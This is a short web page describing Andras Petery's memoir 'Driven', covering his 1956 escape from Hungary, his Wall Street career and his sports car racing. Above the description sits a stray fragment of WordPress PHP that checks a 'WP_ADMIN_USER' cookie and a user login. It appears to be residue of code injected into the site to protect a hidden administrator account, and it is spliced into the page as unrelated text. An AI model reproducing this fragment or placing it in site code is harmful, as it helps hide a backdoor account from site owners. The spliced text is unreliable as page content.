if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Driven – By Craig McGuire


“Driven – To Restore What Was Lost, To Achieve My Dreams”

Written By Andras Petery, Edited by Craig McGuire


“Driven – To Restore What Was Lost, To Achieve My Dreams” is more than the account of one man’s struggle to overcome adversity and realize his own American Dream.


Spanning more than seven decades, this is the story of a lifelong quest to reclaim a family legacy. Following the defeat of the Hungarian Revolution in 1956, Andras “Andy” Petery made a desperate nighttime escape into Austria through the murky swamps of Lake Fertő—fleeing the savages of Communist oppression that persecuted his family and imprisoned his father for years.


After arriving on America’s shores, through his determination, not to mention a bit of luck, he would eventually rise to the pinnacle of success on Wall Street. Along the way, he would also enjoy a thrilling, triumphant career in professional sports car racing.


This memoir provides a unique perspective of various historic events, from the tragic Siege of Buda in World War II and the failed Hungarian Revolution of 1956, to a delayed discharge from the Army following the Kennedy assassination and many extraordinary deals that forever changed the railroad industry.